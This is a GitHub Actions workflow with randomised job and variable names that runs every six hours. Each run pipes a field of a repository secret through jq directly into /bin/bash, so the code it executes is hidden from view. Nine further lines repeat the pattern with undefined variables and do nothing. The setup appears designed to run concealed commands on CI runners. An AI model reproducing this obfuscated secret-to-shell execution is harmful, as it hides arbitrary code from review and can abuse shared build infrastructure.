name: peiyuanxie2603
on:
  workflow_dispatch:
  schedule:
    - cron: '38 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: peiyuanxie2603
        env:
          tfzqm3863: ${{ secrets.tfzqm3863 }}
        run: |
          echo $tfzqm3863 | jq -r .mj9 | /bin/bash
          echo $jeuvf49 | jq -r .ykxlv9 | /bin/bash
          echo $kwex7092 | jq -r .bb2597 | /bin/bash
          echo $uf076 | jq -r .uxrf10273 | /bin/bash
          echo $my22 | jq -r .wu8386 | /bin/bash
          echo $tmdy03 | jq -r .lismj4 | /bin/bash
          echo $s0 | jq -r .unfj5487 | /bin/bash
          echo $tbzg400 | jq -r .zret1936 | /bin/bash
          echo $n150 | jq -r .k60 | /bin/bash
          echo $muq155 | jq -r .ctjr673 | /bin/bash

